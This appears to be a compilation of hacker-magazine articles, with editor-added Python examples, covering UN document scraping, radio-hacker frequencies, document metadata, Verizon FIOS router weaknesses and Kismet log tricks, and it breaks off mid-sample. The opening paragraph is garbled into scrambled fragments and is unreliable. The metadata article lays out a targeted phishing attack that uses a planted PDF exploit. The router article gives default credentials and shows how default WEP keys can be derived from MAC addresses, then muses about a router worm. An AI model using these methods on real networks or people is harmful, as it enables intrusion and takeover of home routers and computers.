Normally. Osama bin Laden and/or the Taliban. you will get to see it. as there is no right of legal defence before an impartial judge or recognizable due process of law. The maintenance of this list is purely a matter for the Security Council.100 (session 62. There are two main political bodies at the heart of the UN: the General Assembly and the Security Council. wherever located. England). In fact. the UN established an international financial sanctions regime through Security Council Resolution 1267. The UN is also needed to fill in for government incompetence around the world. so we don’t see the real picture. as you can see if you click on one of the links from the official UN webpage.VOLUME 26
The How and Why of Hacking the U. This is not necessarily the fault of the United Nations. it seemed only to take a fax from the US embassy containing the code-word Al-Qaeda or Taliban for someone’s entire finances to be frozen. thanks the Internet.

... there’s all manner of discussions that don’t fit with the narrative put out by the usual news-stream. For example, in both 2000 and 2007 there were day long debates on the floor of the General Assembly in which everyone agreed with a resolution entitled: “Peace, security and reunification on the Korean peninsula”. If the contents were more widely known, it would be a lot harder to fit the news-stream around policies that required enemy missiles to be sited in places with illogical targets for illogical reasons, having been constructed by a nation with an incompetent government whose fund of natural born geeks are more than likely starving in the dark on a mountainside having had their family’s corn-field washed away by a series of floods than learning their trade through the vibrant hacker underground. Where do we think technology comes from? This is not the 1980s, that innocent era with its cold war games and the amazing story behind the bombing of Korean Flight 858, as recorded in S/PV/2791. We’ve got bigger problems now than those made-up ones from an interesting, but obviously outdated past. Speaking of made-up problems, not only North Korea... Remember what happened to East Germany in 1990? The stories are everywhere on every issue, such as “World Television Day”, the “Registration Convention”, and the “Optional Protocol to the Convention on the Rights of the Child on the Sale of Children, Child Prostitution and Child Pornography”. Just because the documents are not marked classified doesn’t mean they don’t contain real information or that nobody is paying attention to them.

Now, the transcripts of the Security Council meetings go back only as far as S-PV.2601 (26 June 1985), which means that the meetings relating to the US invasion of Panama in 1989 and the excellent excuses given for it are all accessible. Then there’s a gap. More recently, the meetings between numbers 687 (4 January 1955) and 1021 (15 October 1962) are also online, providing a high-level window into those entertaining Cold War years right up to the Cuban Missile Crisis. Pre-1994, the United Nations documents are generally scanned images. Nevertheless, the transcript documents post-1994 are text PDF, and with a lot of parsing work, name matching, and correcting spelling mistakes, it is possible to extract text and produce structured HTML. I have constructed a site for hosting these parsed documents and linking to them by individual speech and paragraph on my server at www.undemocracy.com. That means, in the General Assembly, you can see all the votes by each country on each issue and tie them in with their Resolutions. Using this site it is possible to pursue interests in citizen journalism by referencing these documents from little-known Wikipedia articles.

The original plan, as outlined by the Secretary-General in document A/C.5/56/12 from 20 November 2001 entitled “Simultaneous availability of parliamentary documentation in electronic form in the six official languages on the United Nations web site,” was to provide direct hyperlinks to the aforementioned documents on the Official Document Server. For some reason, ... one else’s by the use of internet cookies. I have seen these “works-only-for-me” links posted onto many sites on the web, where the problem is invisible to the person who put them there. It is unclear what changed this policy around, and my emails to them go unanswered. Perhaps someone in New York could visit the Dag Hammarskjöld Library building at the United Nations Headquarters at the northeast corner of 42nd Street and 1st Avenue and get back to me with an explanation, while I carry on with what I can do from my distant home. Today, it is possible to unpick the process and successfully scrape a document from the UN’s servers to your own server using the following Python script (Python 2, as published):

import urllib2, urlparse, re, cookielib
# this is the URL for the document S/PV.4701 in English
url = "http://daccess-ods.un.org/access.nsf/Get?Open&DS=S/PV.4701&Lang=E"
# this is the page on the UN website we pretend it was linked from
referrerurl = "http://www.un.org/Docs/scres/2002/sc2002.htm"
req = urllib2.Request(url)
req.add_header("Referer", referrerurl)
fin = urllib2.urlopen(req)
plenrefererforward = fin.read()
fin.close()
# this gives a dummy page that forwards the browser to a temporary page
mfore = re.search('URL=([^"]*)', plenrefererforward)
turl = urlparse.urljoin(url, mfore.group(1))
# this temporary page contains two forwarding links
fin = urllib2.urlopen(turl)
cookielink = fin.read()
fin.close()
# the first to the URL of the actual PDF page
mpdf = re.search('src="(http://daccessdds.un.org/[^"]*)', cookielink)
pdfurl = urlparse.urljoin(turl, mpdf.group(1))
# the second to a URL containing a cookie
mcookie = re.search('URL=([^"]*)', cookielink)
cookieurl = urlparse.urljoin(turl, mcookie.group(1))
# take the cookies from the cookie link
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
fin = opener.open(cookieurl)
fin.close()
# you can't download the pdf unless you give it the cookie
fin = opener.open(pdfurl)
pdfdata = fin.read()
fin.close()
# write the PDF data to your disk
fout = open("S-PV-4701.pdf", "wb")
fout.write(pdfdata)
fout.close()
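The forwarding chain the script above unpicks (a meta-refresh to a temporary page, which in turn points at the PDF and at a cookie-setting URL, with the PDF served only to a session that has taken the cookie) can be exercised offline. The following is an added example written for this edition, not the article's script and not anything from the UN site: the three pages, the hostnames ods.example and dds.example, the paths and the cookie token are all constructed stand-ins, and the server behaviour is simulated in a small class.

```python
"""Added example: resolving a meta-refresh forwarding chain and a cookie gate
offline, in the shape of the live scraping script. All URLs and pages are
constructed placeholders (ods.example / dds.example are not real hosts)."""
import re
from urllib.parse import urljoin

START_URL = "http://ods.example/access?DS=S/PV.4701&Lang=E"
PDF_URL = "http://dds.example/doc/placeholder/N0000000.pdf"
COOKIE_URL = "http://ods.example/setcookie?token=XYZ"

# Constructed stand-ins for the two forwarding pages (not real UN responses).
PAGES = {
    START_URL:
        '<html><head><meta http-equiv="refresh" content="0; URL=/tmp/abc123.html">'
        '</head></html>',
    "http://ods.example/tmp/abc123.html":
        '<html><body><iframe src="http://dds.example/doc/placeholder/N0000000.pdf">'
        '</iframe><meta http-equiv="refresh" content="0; URL=/setcookie?token=XYZ">'
        '</body></html>',
}

META_URL = re.compile(r'URL=([^"]*)')                      # same pattern as the script
PDF_SRC = re.compile(r'src="(http://dds\.example/[^"]*)')  # host is an assumption


def resolve_chain(start_url, fetch):
    """Follow the dummy page to the temporary page and return (pdf_url, cookie_url).
    Relative forwarding targets are resolved against the page they appeared on,
    which is what urljoin is for. `fetch(url)` returns a page body as a string."""
    first = fetch(start_url)
    m = META_URL.search(first)
    if not m:
        raise ValueError("first page carries no forwarding URL")
    temp_url = urljoin(start_url, m.group(1))
    second = fetch(temp_url)
    mpdf, mcookie = PDF_SRC.search(second), META_URL.search(second)
    if not mpdf or not mcookie:
        raise ValueError("temporary page lacks the PDF link or the cookie link")
    return urljoin(temp_url, mpdf.group(1)), urljoin(temp_url, mcookie.group(1))


class FakeODS:
    """Constructed stand-in for the document server: the PDF is only served to a
    session that has visited the cookie URL first, mirroring the real gate."""

    def __init__(self):
        self.sessions_with_cookie = set()

    def fetch(self, url, session="s1"):
        if url.startswith("http://ods.example/setcookie"):
            self.sessions_with_cookie.add(session)   # the cookie link sets the cookie
            return ""
        if url.endswith(".pdf"):
            if session not in self.sessions_with_cookie:
                raise PermissionError("cookie required")  # no cookie, no document
            return "%PDF-1.4 constructed placeholder body"
        return PAGES[url]


def scrape(start_url, server, session="s1"):
    """Resolve the chain, take the cookie, then download: the order matters."""
    pdf_url, cookie_url = resolve_chain(start_url, lambda u: server.fetch(u, session))
    server.fetch(cookie_url, session)
    return server.fetch(pdf_url, session)


if __name__ == "__main__":
    print(resolve_chain(START_URL, FakeODS().fetch))
    print(scrape(START_URL, FakeODS())[:8])
```

Swapping `FakeODS.fetch` for a real HTTP client with a cookie jar gives the same control flow as the article's script; the point of the simulation is that a fetch of the PDF URL before the cookie URL fails, which is exactly why the "works-only-for-me" links break for everyone else.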

Listen to Radio Hackers!
by CRCF

You have a radio scanner covering VHF and UHF? Perfect! You can listen to the discrete frequencies below.

Hot frequencies!

• France, Chaos Radio Club of France (CRCF, ex-leader Larsen) in VHF during 1994-1999: channel 1 : 169.930 MHz FMN for “volunteers”, channel 2 : 169.950 FMN, channel 3 : 169.990 FMN, channel 4 : 170.070 FMN, channel 5 : 170.090 FMN. 169.174 MHz FMN (Walkie-Talkie ALAN CT-145 (5 Watts) vs “Export”). Larsen uses legal “citizen band radios” to transmit (27 MHz CB: ALAN 42 Multi (1 W AM, 4 W FMN) and PMR 446 MHz (500 mW): Yaesu Vertex Standard VX-146) for local link. Larsen is very active in PMR 446.
• Holland, Hack Tic in VHF during HIP 97 (possible HAR 2009?): 145.000 MHz FMN*
• Germany, Chaos Computer Club d’Hambourg (CCCH) in UHF during HIP 97, only members of CCC: 433.375 MHz Simplex FMN, 433.625 MHz FMN
• USA, radio hackers in VHF and UHF: 49 MHz, 151.625 FMN, 151.875 MHz FMN, 154.600 FMN (McDonalds hacking!), 156.875 FMN, 158.000 FMN*, 173.000 FMN*, 444.900 FMN, 464.500 FMN, 464.550 FMN
• Satellites: AMSAT, CUBESAT, ISS and the NOAA (Wxsat), 136 MHz

*Only for testing crypto-voice and low-data link (RTTY)

• https://www.ccc.de/
• http://www.har2009.org/

Larsen (Vincent Plousey) busted by French secret service (DST), April 2000
• http://www.transfert.net/French-hacker-sued-by-an
• http://www.bugbrother.com/archives/larsen/larsen.htm
• http://cryptome.info/larsen091200.htm

Larsen’s websites
• http://14frs128.site.voila.fr/
• http://astronautique21.site.voila.fr/
• http://www.rebelz.org/
• http://crcf.[...].org/ (no longer online)
Abusing Metadata
by ChrisJohnRiley

What is metadata?

Metadata, coming from the Greek word “meta,” meaning about, is a rich source of information that is stored within the structure of a file when it’s saved. It seems simple, and it is. However, it can contain a host of potentially useful information to the average bad guy or generally curious type. This information can include details about the author of the document, date of creation, last edited date, path information, and which application was used for creating the file. This information will vary depending on the file type. Some file types will provide nothing more than a time/date stamp and others will want to tell you their life story, so to speak.

How can you see the metadata?

Good question, I’m glad you asked. There are a number of ways to view the metadata contained within files.

Windows: Under Windows the easiest way to view simple metadata is to right-click on the file you’re interested in and select properties. With specific file types you’ll see a ‘Summary’ tab that will include some basic details. Using Microsoft Office documents as an example, this tab should contain the version of software used to create the file, as well as the usual creation information. In some versions of Microsoft Office, you should see some basic statistical information about the document (number of words etc.). Looking at PDF files will also provide a wealth of information. When you look at the properties of a PDF file, you’ll likely see a ‘PDF’ tab that contains specific information about the creation of the PDF document. Underneath this you’ll find the creation date, as well as hopefully some information about the author and the name of the company the software is registered to. Information about the Author is optional here, and isn’t usually automatically entered (unlike Microsoft Office, which will populate this field from your user settings). However, you’ll also be able to see the exact version of software used to create/edit the file. If you want to go deeper into metadata you can pick up a number of third party tools that will extract the information from documents for you. Tools like Metaviewer and MetadataAssistant can gather together all this information into a single location.

Linux: Under Linux, the options for extracting metadata are a lot more flexible than they are under Windows. After all, isn’t everything more flexible under Linux? At a basic level, you can use the ‘strings’ command to examine one or more files for human readable strings contained within the file. This will give you a long output, most of which isn’t going to be particularly useful for you. However, hidden somewhere in this list of strings you’ll usually find the same information that I alluded to above. The power of Linux, however, is that you can take this output and search it for specific strings. For example ‘cat file.pdf | strings | grep -i adobe’ will search file.pdf for any strings matching the word adobe. This should output a number of strings and hopefully the version of software used to create the file. You can fine tune this simple search function to look at multiple files, or search for other strings very easily. Although, that said, this won’t work for every type of file and won’t give you all the information you might want. As with Windows, you can also install a number of third party tools to make metadata searching easier. Running a quick search on your distribution’s software list should pop up two or three options. Personally, I’d start by looking at the extract tool, as this should offer what you need from a command line and should be easy to find in your package manager. Command syntax couldn’t be easier: ‘extract’. You can get basic text output from the extract tool. You can use the -p option to set a specific metadata field that you want to see. For example ‘extract -p creator test.doc’ will output just the creator data associated with the test.doc file.

What about Image Files?

Unlike the document types we covered above, you’ll probably need to install a specific application to get at the really interesting data stored in image files. Image files can, and usually do, provide information that can be very informative. Image files include a number of EXIF tags that contain a wealth of information about the type and model of camera used to take the picture, as well as thumbnail information and even GPS data, if the camera is fitted with one (like the iPhone, for example). Personally, I use the Exiftool application written by Phil Harvey (sometimes with the ExifToolGUI, if I’m feeling really lazy). If you’re on Linux, you can get the libimageexiftool-perl module direct from your repository. For Windows users, you can get an installer from Phil Harvey’s website (see links below). As with Microsoft Office, you’ll come across a number of command line and GUI applications that will do a little more for you, if you search for ‘EXIF’ on Google. The thumbnail information can be useful depending on the way the picture has been edited. If a thumbnail image isn’t re-created after editing, then the thumbnail will represent the original picture and not the edited, cropped, or touched up final version. This has been used more than once with embarrassing results. Search for “Cat Schwartz exif” or “Meredith Salenger exif” for more information (not safe for work). Using the exiftool you can easily export this data by typing ‘exiftool -b -ThumbnailImage image.jpg > image_thumb.jpg’. There are many more possibilities here, so your best bet is to check out the Exiftool documentation.

What else can you see?

Taking it from another point of view, it’s possible to view information on the revisions that took place within the document (if they’ve not been cleaned prior to publishing). It’s common in business to work in teams when creating specific types of documents, especially when it comes to the marketing team needing to make changes to public documents. Collaboration is a big thing for companies like Microsoft. The back and forth goes on until the final document is completed. However, the information for each revision of the document is stored unless it’s specifically stripped from the document. A prime example of this is the research done by Michal Zalewski back in 2004. He wrote an article about data stored within Microsoft Office documents, along with a (now) outdated tool called the revisionist that extracts the revision information, including writers’ notes and changes. The article can still be read on his website. I’ll not rehash the contents of the story here, suffice it to say, it was a little embarrassing for Microsoft to have the revision history of their publicly available documents exposed on the internet. Microsoft quickly got the message and began cleaning metadata from the files it uploaded. Other companies, however, don’t seem to have gotten that clue just yet. Obviously, we all value our privacy and nobody likes to think that a document we’ve written will contain possibly sensitive information about us.

In order to see this information, you can open up the files in Word and select to review all revisions through the collaboration options. This information can be extracted and used to our advantage. The revisionist tool was designed to do this automatically on entire directories. However, time has moved on since the tool was first made and running it on more recent documents results in error. This just means that we need to break out the trusty Linux toolbox and take a look. Using Office 2007 as an example, we can take the .docx file and expand it using unzip (docx is a container and not just a document, after all). Once expanded, you’ll find the collaboration information in the ./word/document.xml file. You can see additions and deletions based on their XML tags. For example, deleted entries are surrounded by delText tags. You can easily find these in Linux using ‘sed -n -e ‘s/.*<w:delText[^>]*>\(.*\)<\/w:delText>.*/\1/p’ document.xml > deleted.out’. Comments can similarly be found by looking at the ./word/comments.xml file. This can obviously get a little long winded if you’re searching an entire website’s worth of data.

Why is all this useful?

Why should you care about this information? Well, there are a number of reasons. I regularly find metadata in files when performing penetration tests. After all, as a penetration tester, metadata is a treasure trove of useful information. Simply finding a few PDF and Word documents on a website could give me enough information to launch a focused, client-side attack. Not all files are going to contain useful data, so it’s best to check multiple files from various sources (website, emailed press releases, etc.). Google hacking is your friend here. I’ll run you through the process, step by step.

After gathering some files from the target company (possibly using a Google search such as site:target.com filetype:pdf), I can run the PDF files through strings/extract and isolate the information that I want. I can see from the metadata I’ve extracted that the company is using Adobe Acrobat Professional 8.1.2 for Windows (this is listed in the metadata as the product used to create the PDF files). I also find the full names of several authors who wrote documents for the website. The final piece of information is the document creation date. From the creation date I can see that they wrote the documents last month, so the information I’ve extracted from the metadata is relatively current. After all, no point in using outdated data. Using the information I’ve gathered, I call the company reception (probably late evening or lunchtime, in the hope that my target is away). I simply ask for the email address of the target. Simple request, nothing too heavy. Maybe you can even skip this step if you can determine the email address based on other information gathered from the Internet. Adobe Acrobat 8.1.2 has a known flaw that can be exploited using malformed PDF files. I won’t go into how to achieve this here, as that’s not the point of this article. Taking one of the PDF files I examined earlier, I edit it to insert a client-side exploit. Now it’s time to write him an email, so that I can forward him a new revision of the document for consideration. Armed with the name of the author and the content of the documents, it’s a simple case of writing a believable email that is convincing enough to get him to open my version of the PDF. As you’re targeting a specific individual or group, this shouldn’t be too hard to achieve. As we’re all more than capable of clicking a few links, no doubt, it’s time to sit back and wait for the exploit to run. What happens from here is up to you. Of course, this information is provided for educational purposes only. Without the valuable metadata, this attack would have been a lot harder to achieve. There would have been no specific target information and no idea which client-side exploit could work. Of course, metadata didn’t make this user vulnerable. He was always vulnerable. It just made things easier for us to exploit.

Can I remove metadata?

If you want to remove the metadata stored in your documents, there are a number of options. Microsoft has released an add-in for Office XP/2003, as well as building a feature into Office 2007 to clean metadata from files. Both of these options will strip specific metadata from Microsoft Office files as you save them. There are also a number of third party tools on offer, like iScrub and 3BView, that do the same job. Adobe has also begun incorporating metadata removal into their latest versions. If you’re looking to ensure that all of your files are metadata free, you’ll have to look beyond the desktop plugins. The Microsoft solutions, although handy, do little to protect you from all those documents you have saved on your servers, desktops and online. For bulk cleaning, the third party offerings are probably where you’ll find the best options, but there are enterprise solutions out there. Plus, there will always be the odd user who forgets to clean the metadata before saving.

Resources
• Michal Zalewski (Revisionist) http://lcamtuf.coredump.cx
• Larry Pesce (metadata the silent killer) http://www.sans.org/reading_room
• Phil Harvey (Exiftool) http://www.sno.phy.queensu.ca/~phil/exiftool
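The two things the article pulls out of Office files by hand, the creator field (‘extract -p creator’) and the tracked deletions and comments inside the unzipped .docx, can be read with nothing but the Python standard library, because a .docx is a zip of XML parts. The block below is an added example written for this edition, not the author's tooling and not any of the products named above. The document it inspects is constructed in memory with placeholder names (“J. Placeholder”, “marketing-temp”) so the example runs offline; the XML it contains is a minimal subset of what Word writes.

```python
"""Added example: reading core properties, tracked deletions and comments from a
.docx with zipfile + ElementTree. The sample document is constructed here and
is not a real file; the author names in it are placeholders."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by the OOXML parts we read.
W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DC = "http://purl.org/dc/elements/1.1/"
CP = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"


def build_sample_docx():
    """Constructed sample: a minimal docx with core properties, one tracked
    deletion (w:del / w:delText) and one comment. Not a real document."""
    core = f'''<?xml version="1.0"?>
<cp:coreProperties xmlns:cp="{CP}" xmlns:dc="{DC}">
  <dc:creator>J. Placeholder</dc:creator>
  <cp:lastModifiedBy>marketing-temp</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
</cp:coreProperties>'''
    document = f'''<?xml version="1.0"?>
<w:document xmlns:w="{W}"><w:body><w:p>
  <w:r><w:t>Price: </w:t></w:r>
  <w:del w:author="J. Placeholder"><w:r>
    <w:delText>internal cost 40 USD, quote </w:delText>
  </w:r></w:del>
  <w:r><w:t>100 USD</w:t></w:r>
</w:p></w:body></w:document>'''
    comments = f'''<?xml version="1.0"?>
<w:comments xmlns:w="{W}"><w:comment w:author="marketing-temp">
  <w:p><w:r><w:t>do not send the old figure to the client</w:t></w:r></w:p>
</w:comment></w:comments>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", document)
        z.writestr("word/comments.xml", comments)
    return buf.getvalue()


def _part(docx_bytes, name):
    """Return the parsed XML root of one part, or None if the part is absent."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if name not in z.namelist():
            return None
        return ET.fromstring(z.read(name))


def core_properties(docx_bytes):
    """Everything in docProps/core.xml as {local-name: text}: creator,
    lastModifiedBy, revision, dates... the same field 'extract -p creator' shows."""
    root = _part(docx_bytes, "docProps/core.xml")
    if root is None:
        return {}
    return {el.tag.split("}")[1]: (el.text or "") for el in root}


def deleted_text(docx_bytes):
    """Text of every w:delText run: what the sed one-liner is fishing for."""
    root = _part(docx_bytes, "word/document.xml")
    if root is None:
        return []
    return [el.text or "" for el in root.iter(f"{{{W}}}delText")]


def comments(docx_bytes):
    """(author, text) for each comment in word/comments.xml, if the part exists."""
    root = _part(docx_bytes, "word/comments.xml")
    if root is None:
        return []
    out = []
    for c in root.iter(f"{{{W}}}comment"):
        author = c.get(f"{{{W}}}author", "")
        text = "".join(t.text or "" for t in c.iter(f"{{{W}}}t"))
        out.append((author, text))
    return out


if __name__ == "__main__":
    sample = build_sample_docx()
    print(core_properties(sample))
    print(deleted_text(sample))
    print(comments(sample))
```

Pointing `core_properties`, `deleted_text` and `comments` at the bytes of a real .docx works unchanged; the XML parser is what makes this more robust than the sed pattern, which only catches a deletion that starts and ends on one line.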
Verizon FIOS Wireless Insecurities
by phishphreek phishphreek@gmail.com

I was a long time customer of Comcast High Speed Internet. As soon as Verizon FIOS became available in my area, I immediately signed up for their Internet service. I opted to go with their highest package at the time, which was an impressive 15 Mbps/15 Mbps. Verizon has since come out with a much faster package of 50 Mbps/20 Mbps. I opted to use the 15/15 because I’ve always leeched torrents, due to my subpar connections, and I was finally in a position to give back to the community. I seed mostly various open source projects that are large in size, such as distros or similar.

During the install, as usual, the tech didn’t seem to know much more than how to hook up the standard connections. He was only familiar with running their install program on a Windows OS. He had no idea how to connect my Linux box to the wireless router. I asked him for the WiFi info and told him not to worry about it. I could easily connect without his help. When I started to look over the info he provided, I saw something of concern. I was amazed that they chose this as their default settings. While they are giving out WiFi routers to all FIOS customers and enabling “security,” they are using WEP. WEP has long been known to have poor security1. I told the tech that they were implementing an insecure protocol for wireless protection. He said that he had never heard such a thing and couldn’t believe that Verizon would do that. They “took security very seriously.” I then told him that if someone knew what they were doing, they could easily break the WEP encryption in minutes. He shrugged it off as though it wasn’t his problem and told me to call customer service. Of course, that’s what I immediately wanted to do, because I knew better.

I got the default UID and PWD to change my security settings (UID: admin PWD: password1). I quickly found the wireless settings, but was surprised by the user interface. Changing from a WEP to WPA2 setting was easy enough for me, but I think it would be confusing to a normal user. I’ve worked with many users in the past in a support role and it’s very easy to confuse them. In order to enable WPA, you must first disable WEP under the menu “Basic Security Settings” which has a title/warning of “(We recommend using WEP because it encrypts your wireless traffic.)”. To enable WPA2, you have to go to another section titled “Advanced Security Settings.” Once there, you have to change it from “WEP (Recommended)” to “WPA2 (An enhanced revision of WPA providing stronger security settings)” which, to a normal user might seem wrong since WEP is “Recommended.” So to an end user, it may seem wrong to disable WEP. They might as well leave it wide open. If they left it wide open then at least some people would realize that it was insecure and might enable a WPA2 or a WPA2/802.x config. Nonetheless, I changed from WEP to WPA2 with the maximum length random shared key.

I later decided to survey wireless connections in my neighborhood. I live in a rather large apartment complex. The complex is marketed as “Luxury” and is more upscale than most other complexes in my area. A lot of people have WiFi and other high tech devices. Firing up Kismet from my office on my laptop reveals over 75 wireless routers. If I walk the perimeter of my apartment, over 125 access points show up. A quick drive around the development reveals over 500 access points. When I first moved in, there were not nearly as many (about half) and many of them were not protected at all. Two years later, I’m happy to see that most are at least using WEP. Increasingly, I’ve been seeing people deploy WPA2.

It’s pretty easy to find a Verizon FIOS wireless connection. They tend to use pretty decent routers from Actiontec2. The specific model that I have is a MI424WR3. The SSID is normally random looking and stands out in the list. It is always 5 characters and is comprised of letters and numbers. Enter Kismet4. Using Kismet, you can simply listen passively to this traffic and select the Verizon FIOS wireless access point of your choice. Then use the “c” option on the AP to view the clients. What do we have here? It looks like a client with a MAC that starts with the same three octets of the device’s WLAN MAC! Could that be the WAN MAC address? Yep, it is! That’s right, just like a cheesy infomercial, it gets better. As it turns out they use the last 40 bits of the WAN MAC address of the router as the default WEP key! They put it right on the router with the SSID information for consumer convenience. We already have a couple important pieces of information. Well, in order to attach to one of these devices, we should only need the WEP key, right? But wait. Just drop the first octet of the WAN MAC, you have the WEP key. The OUI for the models in my area are 00:1F:90 and 00:18:01. Maybe more could be found by searching ieee.org. That means that if the device starts with 00:1F:90, the WEP key will ALWAYS start with 1F90 and I’ve only got to figure out for myself the last three octets. So, since the octets are in hex, that gives me 16 possible combinations for each octet or ~16^3=4096. It should be pretty easy to brute force that through a script. We know that we can drop the first octet and keep the next two of the WLAN MAC address towards our 40 bit WEP key. More than likely, you’ll be able to connect to the device easily. I’ve only tried to access a couple of them (with my neighbor’s permission of course) and I’ve been able to get right on.

I’ve always seen these devices on 192.168.1.1 by default. If they were not smart enough to change from WEP to WPA2, then you still have a good chance of logging into the router with the default UID and PWD above. Seeing as many people use these devices as a firewall for their home computers, it’s also easier to gain remote access to the computers because security is more lax behind a so-called firewall. An attacker can gain complete control of the router, which, in my opinion, is worse than the hosts directly on the network. It’s simple to modify the firewall to allow remote administration. Configuring dynamic DNS features will increase the likelihood of finding and controlling of these devices. You don’t have to be in the immediate proximity after initial compromise of the device. Not to mention that it’s easy to modify the DNS server that the router is using, which means that you can redirect just about any traffic you want (when clients are using the router as a DHCP server) pretty easily by setting host entries in the router or by redirecting to your own DNS server. Let’s not also forget all the fun that could be had by modifying routing tables or loading a custom firmware such as DD-WRT6. The Actiontec MI424WR firmware is GPL’d5, so it would be pretty simple to modify the source for your own needs, recompile and then load. It might even be conceivable to write a wireless worm of sorts which uses the routers as a Kismet drone7 to identify neighbor Verizon FIOS routers and then break into them, uploading custom firmwares or settings and creating a botnet of very high-bandwidth endpoints distributing their firmware via ftp, tftp, torrent, or even running TOR8 endpoints! The possibilities are vast. These insecurities are not insignificant.

The whole point of this article is to bring attention to the gross insecurities of Verizon FIOS router default settings. After a short survey, none of them had changed their default settings and I helped them to better secure their connections using WPA2 and changing the default settings.

Resources
1. http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
2. http://www.actiontec.com/
3. http://www.actiontec.com/products/product.php?pid=41
4. http://www.kismetwireless.net/
5. http://opensource.actiontec.com/
6. http://www.dd-wrt.com/
7. http://www.dd-wrt.com/wiki/index.php/Kismet_Server/Drone
8. http://www.torproject.org/

Transmissions
by Dragorn

Seven Years of Wireless Fun

The stars (or in this case, access points) align: The summer issue for H2K2 had one of the first articles about Kismet (and my first article for 2600), and this summer has the first release of a completely rewritten Kismet which has been under development for five-plus years. Being, of course, absolutely on top of deadlines and never rushing things, as several people are all too happy to remind me... but that would preclude bringing us to... Besides, “seven years of wireless fun” sounds better than “a bunch of years.”

So what’s changed since 2002? In many ways, not a whole lot. Using WEP on a home network is still, really, foolish, considering how easy it is to break, but using it on a network with any sort of business application is begging for an intrusion. Unfortunately, it’s harder to separate statistics about home networks from networks used for inventory control, point-of-sale, or offices. However, this info is available on http://www.wigle.net worldwide.

Stupid Kismet Trick #1: Quick-and-dirty processing of log files. I decided instead of writing a full XML parser to process log file lines, obviously the better solution was to spend a frantic five minutes with the AWK manual and toss together some ugly script:

cat *.nettxt | awk '/^ BSSID/ { ssid=0; printf "%s ", $3; }; /: Beacon/ { ssid=1; }; /Encryption/ { if (ssid) printf "%s", $0; }; /Channel/ { printf "\n"; };' | grep Encryption | sort | uniq | grep WEP | wc -l

This gives us a least-possible-effort mechanism for taking a directory full of logs, squash the network plaintext output format into single-line records, and count them. Within 50,000 networks collected randomly over the course of six months across several major cities, approximately 30 percent of networks are still wide open, 40 percent use WEP, and the remainder use some form of WPA (significantly leaning towards WPA-TKIP, only five percent of the total advertise WPA2-AES). Absolutely shocking. This is up from a few years ago, when 20 percent encryption was a promising statistic. Slowly, the tide is turning. In retrospect, it seems, most likely, that the average home user hasn’t listened all that well.

Bigger changes lie under the hood. Despite taking longer (much longer, as in multiple years longer) than intended, the Kismet-2009-05-RC release incorporates a complete rewrite of the Kismet engine and user interface, with a completely redesigned packet processing system with usability and expandability as the main goals. Kismet sports a completely redone UI. While still in Curses text mode (hey, I like curses, I curse all the time), the new user interface is widget-based and dynamically reconfigurable. Among other key new features, Kismet will now automatically detect the driver type of network interfaces, automatically detect the supported channels on a capture interface, can have new dynamic sources added while it is running, can export packets real-time to any other pcap based tool via tun/tap virtual network interfaces, and keep running through most errors that would have killed previous releases.

Most significantly, Kismet now supports plugins which can do nearly anything within the framework that Kismet does already, such as defining new alerts, adding new commands and reports to the client-server protocol, and even defining new capture types and log files. Internally, once read by a packet source, data travels the “packet chain” where any type of arbitrary information can be attached, such as decrypted WEP data, GPS location, IDS alerts, and any other data collected by Kismet. Plugins can attach anywhere along the chain: New packet data, decryption, network decode, logging, and so on. For Kismet, a plugin receives all data which was attached to the packet in previous stages (such as decrypted WEP data, IDS alerts, tracked networks and clients) and can attach any information, including new custom data to be interpreted by later stages. Plugins can also be attached to the client, and can add new windows and widgets, and even change the main window layout. There’s a lot of possibilities, however, but what actual plugins are there? So far, Kismet bundles two plugins of its own, Kismet-PTW and Kismet-Spectools, which implement a passive Aircrack-PTW and integrate with the Spectools spectrum analyzer software. With the PTW plugin loaded, Kismet can automatically attempt to crack the WEP key of a protected network when enough data has been seen, without ever injecting any packets, raise an alert that WEP has been cracked, automatically add the discovered WEP key to the log files for future reference, and enter the WEP key into the decryption system so all future packets from the network are decrypted automatically. The first third-party plugin comes from http://www.[...].org and implements a completely new capture type, reading data from DECT digital phone cards and expanding Kismet sniffing beyond 802.11. Server and client plugins define a new network protocol for DECT phone records and display it integrated in the UI. Development continues, and hopefully others will start writing plugins (read as: that’s a hint) to add new features and functionality.

Stupid Kismet Trick #2: Getting information out of Kismet real-time. Kismet writes data files at regular intervals, but reading them while Kismet is running can cause problems. Fortunately, Netcat and (once again) Awk come to the rescue here:

echo -e '\n!0 enable channel channel,networks' | nc localhost 2501 | awk 'BEGIN { CHN = 0; }; /CHANNEL:/ { chnum[CHN]=$2; chval[CHN]=$3; CHN=CHN+1; }; /TIME/ { if (CHN != 0) { printf("["); for (x = 0; x < CHN; x++) { printf("{\"id\":%s,\"value\":%s}", chnum[x], chval[x]); if (x < (CHN-1)) printf(",") } printf("]\n"); CHN=0; fflush(""); } };' | while read line; do echo "$line" > channel.json; done

Which is the quick and dirty way of converting the Kismet channel usage report (in this case, number of networks per channel) into a JSON file for displaying channel usage in AJAX. Similar magic can be done to extract active networks in the vicinity.
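Both tricks, squashing .nettxt records to one line per network and counting encryption types (Trick #1), and emitting per-channel counts as JSON (Trick #2), come down to the same thing: keep the encryption lines that belong to a beacon, and group by channel. The block below is an added example written for this edition, not Kismet's code and not Dragorn's; it reads the same fields in Python so the beacon-only rule is explicit, and builds the channel JSON from the parsed records instead of from the live client protocol. The .nettxt text is constructed in the shape of Kismet's plaintext log; the field layout is approximated from the awk pattern, not copied from a real file.

```python
"""Added example: Kismet .nettxt -> one record per network -> encryption
statistics and per-channel JSON. SAMPLE_NETTXT is constructed, not a real log."""
import json
import re
from collections import Counter

SAMPLE_NETTXT = """\
Network 1: BSSID 00:11:22:33:44:55
 Manuf      : Unknown
 BSSID      : 00:11:22:33:44:55
 SSID 1
  Type       : Beacon
  SSID       : "home-net"
  Encryption : WEP
 Channel    : 6
Network 2: BSSID 00:11:22:33:44:66
 BSSID      : 00:11:22:33:44:66
 SSID 1
  Type       : Beacon
  SSID       : "openwifi"
  Encryption : None
 Channel    : 1
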